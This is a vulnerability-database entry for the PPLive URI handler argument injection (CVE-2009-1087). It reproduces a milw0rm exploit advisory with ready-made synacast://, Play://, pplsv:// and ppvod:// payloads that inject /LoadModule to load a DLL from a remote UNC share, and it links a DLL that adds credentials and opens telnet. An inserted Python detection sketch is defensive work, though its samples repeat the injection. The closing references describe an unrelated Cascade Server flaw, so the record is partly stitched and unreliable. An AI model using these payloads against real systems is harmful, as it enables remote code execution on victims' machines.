https://www.exploit-db.com/exploits/8215
https://www.securityfocus.com/bid/34128
https://cxsecurity.com/issue/WLB-2009030236
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-431
PPLive URI handler "LoadModule" parameter multiple code execution vulnerabilities

Vulnerability ID | 1117477 | Vulnerability type | Input validation |
Published | 2009-03-16 | Updated | 2009-04-07 |
CVE ID | CVE-2009-1087 | CNNVD ID | CNNVD-200903-431 |
Platform | Windows | CVSS score | 9.3 |
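|Vulnerability source
|Vulnerability details
PPLive is a very popular P2P network video client. The synacast://, Play://, pplsv:// and ppvod:// URI handlers in PPLive do not properly validate URI parameters when evaluating command-line arguments. If a user is tricked into following a link that contains a specially crafted /LoadModule parameter, Internet Explorer can be made to load the DLL specified by a remote UNC path.
|Exploit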
--------------------------------------------------------------------------------
PPLive <= 1.9.21 uri handlers "/LoadModule" remote argument injection
by Nine:Situations:Group::strawdog
--------------------------------------------------------------------------------
software site:http://www.pplive.com/en/index.html
our site: http://retrogod.altervista.org/
software description:
"PPLive is a peer-to-peer streaming video network created in Huazhong University
of Science and Technology, People's Republic of China. It is part of a new
generation of P2P applications, that combine P2P and Internet TV, called P2PTV."
vulnerability:
The "synacast://", "Play://" ,"pplsv://" and "ppvod://" URI handlers do not
verify certain parts of the URI before evaluating command line parameters.
This can be exploited against Internet Explorer to e.g. load a dll from a remote
UNC path via the "/LoadModule" parameter, example exploit (IE7):
synacast://www.microsoft.com/?"%20/LoadModule%20\1.2.3.4\unc_share\sh.dll%20"
Play://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20"
against older versions:
pplsv://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20"
ppvod://www.microsoft.com/?"%20/LoadModule%20\\1.2.3.4\unc_share\sh.dll%20"
test dll which adds new credentials / spawns the telnet server:
http://retrogod.altervista.org/9sg_pplive_sh.html
some interesting readings:
http://msdn.microsoft.com/en-us/library/aa767914(VS.85).aspx
--------------------------------------------------------------------------------
# milw0rm.com [2009-03-16]
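A detection sketch for the argument injection described above, added here as an example and not part of the original advisory or of PPLive's code. It percent-decodes links that use the four affected schemes and flags any that contain a quote or whitespace followed by a `/Switch` token; the function names, sample links and the assumption that the handler passes the URI as one quoted command-line argument are illustrative.

```python
import re
from urllib.parse import unquote

# Schemes named in the advisory; URI scheme names are case-insensitive.
PPLIVE_SCHEMES = {"synacast", "play", "pplsv", "ppvod"}

# Assumption: the handler receives the URI as one quoted argument. Once decoded,
# a quote or whitespace can end that argument; a "/Name" token right after it
# is then read as a separate switch.
SWITCH_AFTER_BREAK = re.compile(r'["\s]+/([A-Za-z][A-Za-z0-9]*)')
UNC_PATH = re.compile(r'\\\\[^\\\s"]+\\[^\s"]+')


def inspect_uri(uri):
    """Return findings for a PPLive-scheme URI, or None for other schemes."""
    scheme, sep, rest = uri.strip().partition("://")
    if not sep or scheme.lower() not in PPLIVE_SCHEMES:
        return None
    decoded = unquote(rest)  # catches %22 and %20 as well as literal forms
    return {
        "scheme": scheme.lower(),
        "breaks_quoting": any(c == '"' or c.isspace() for c in decoded),
        "switches": SWITCH_AFTER_BREAK.findall(decoded),
        "unc_paths": UNC_PATH.findall(decoded),
    }


def suspicious(uris):
    """Keep only URIs that could smuggle extra command-line arguments."""
    hits = []
    for uri in uris:
        info = inspect_uri(uri)
        if info and (info["breaks_quoting"] or info["switches"]):
            hits.append((uri, info))
    return hits


# Constructed sample links (documentation host names and address, not real data).
SAMPLE_LINKS = [
    "synacast://media.example/channel/42",
    r'Play://media.example/?"%20/LoadModule%20\\198.51.100.7\share\x.dll%20"',
    "ppvod://media.example/?%22%20/LoadModule%20x.dll%22",
    'https://media.example/?q="%20/LoadModule',
]

if __name__ == "__main__":
    for uri, info in suspicious(SAMPLE_LINKS):
        print(info["scheme"], info["switches"], info["unc_paths"], uri)
```

The same check can run in a mail or web gateway over extracted links, or inside a protocol handler before it acts on the URI it was launched with.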
|Affected products
PPLive PPLive 1.9.21
|References
Source: XF
Name: cascadeserver-xlst-command-execution(49332)
Link: http://xforce.iss.net/xforce/xfdb/49332
Source: BID
Name: 34186
Link: http://www.securityfocus.com/bid/34186
Source: BUGTRAQ
Name: 20090319 Command Execution in Hannon Hill Cascade Server
Link: http://www.securityfocus.com/archive/1/archive/1/501981/100/0/threaded
Source: MILW0RM
Name: 8247
Link: http://www.milw0rm.com/exploits/8247